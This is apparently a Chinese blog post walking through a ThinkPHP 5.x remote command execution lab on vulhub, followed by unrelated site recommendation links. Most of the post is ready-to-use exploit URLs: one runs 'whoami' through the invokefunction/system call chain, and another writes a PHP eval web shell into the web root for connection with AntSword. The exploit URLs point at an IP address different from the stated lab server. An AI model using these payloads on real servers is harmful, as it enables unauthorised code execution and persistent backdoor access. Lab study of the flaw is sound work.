Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
qianshang2332 小时前
SQL注入学习总结
网络·数据库·渗透
感谢地心引力4 小时前
安卓、苹果手机无线投屏到Windows
android·windows·ios·智能手机·安卓·苹果·投屏
云小逸4 小时前
【网络通信】同一网段与不同网段的通信原理
网络·网络安全
珠海西格5 小时前
“主动预防” vs “事后补救”:分布式光伏防逆流技术的代际革命,西格电力给出标准答案
大数据·运维·服务器·分布式·云计算·能源
zr5268554475 小时前
PCIe-PN卡(三格电子)
网络
阿波罗尼亚5 小时前
Kubectl 命令记录
linux·运维·服务器
无名的小三轮5 小时前
防火墙基础实验:智能选路下的透明DNS选路配置
网络
一轮弯弯的明月5 小时前
TCP传输大致过程、流量控制与拥塞控制
网络·tcp/ip·计算机网络·学习心得
Fᴏʀ ʏ꯭ᴏ꯭ᴜ꯭.5 小时前
Keepalived单播模式配置与实战指南
linux·服务器·负载均衡
IDC02_FEIYA6 小时前
Linux文件搜索命令有哪些?Linux常用命令之文件搜索命令find详解
linux·运维·服务器
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)042026数学建模美赛题目特点与选题建议,常用四大模型汇总05UV安装并设置国内源062026美赛A题智能手机电池续航时间预测的连续时间数学模型07Claude Code Skills 实用使用手册08一种新的LCA算法09Linux下V2Ray安装配置指南10在Trae中使用Pencil MCP